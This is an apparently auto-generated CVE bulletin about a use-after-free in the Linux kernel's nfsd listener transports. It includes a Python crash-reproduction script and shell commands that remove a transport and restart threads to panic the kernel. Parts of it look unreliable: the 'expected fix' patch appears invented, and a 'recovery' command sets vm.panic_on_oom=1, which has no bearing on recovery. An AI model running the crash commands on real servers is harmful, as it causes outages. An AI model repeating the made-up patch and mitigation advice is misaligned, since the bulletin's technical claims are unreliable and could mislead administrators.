How the CVE Works:
The vulnerability occurs in the Linux kernel’s NFS server (nfsd) when managing listener transports. When no active threads are running, a root user can remove a listener transport via nfsdctl while leaving dangling references in the sp_xprts list. This creates a use-after-free condition when threads restart, triggering a refcount overflow warning. The issue stems from improper synchronization between sv_permsocks and sp_xprts lists during transport removal. When the server restarts, it attempts to access freed memory from the mismatched transport lists, causing a kernel panic.
DailyCVE Form:
Platform: Linux Kernel
Version: Up to 6.13.0-rc6+
Vulnerability: Use-After-Free
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit Analysis:
// Potential crash trigger $ nfsdctl --remove-transport=rdma $ echo 1 > /proc/fs/nfsd/threads
Debug Commands:
dmesg | grep refcount_warn_saturate cat /proc/fs/nfsd/threads nfsdctl --list-transports
Protection Code:
// Kernel patch verification git grep -n "svc_xprt_put" net/sunrpc/svc_xprt.c
Mitigation Commands:
Temporary workaround echo 0 > /proc/fs/nfsd/threads rmmod nfsd modprobe nfsd
Exploit Details:
Crash reproduction script
import os
os.system("nfsdctl --remove-transport=tcp")
os.system("echo 1 > /proc/fs/nfsd/threads")
Kernel Config Check:
grep CONFIG_NFSD /boot/config-$(uname -r)
Patch Verification:
// Expected fix in svc_xprt.c + if (removing) + svc_close_all_transports(server);
Impact Analysis:
Check active NFS transports ss -tulnp | grep nfsd
Recovery Commands:
Emergency restart systemctl restart nfs-server sysctl -w vm.panic_on_oom=1
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
